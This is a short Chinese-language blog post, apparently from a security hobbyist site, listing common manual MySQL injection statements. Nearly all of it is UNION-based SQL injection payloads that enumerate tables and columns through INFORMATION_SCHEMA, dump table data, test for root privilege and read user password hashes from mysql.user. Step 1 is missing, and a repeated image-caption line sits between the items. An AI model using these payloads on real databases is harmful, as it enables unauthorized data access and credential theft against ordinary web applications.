蜗蜗侠's Blog-关注网络安全移动版

主页 > 技术笔记 >

Mysql手工注入常用语句

1.查当前数据库
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 2.查表名:UNION ALL SELECT NULL,NULL,table_name,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='表名'#
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 3. 查列名:UNION ALL SELECT NULL,NULL,column_name,NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61727469636c65 AND table_schema=0x74657374# 
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 4.取数据:UNION ALL SELECT title,author,id,title,NULL,NULL FROM test.article#  
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 5. 权限判断:UNION ALL SELECT NULL,NULL,CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END,NULL,NULL,NULL# (ROOT权限返回1)
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 6.读取ROOT密码:UNION ALL SELECT NULL,password,user,NULL,NULL,NULL FROM mysql.user# 
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
(责任编辑:蜗蜗侠)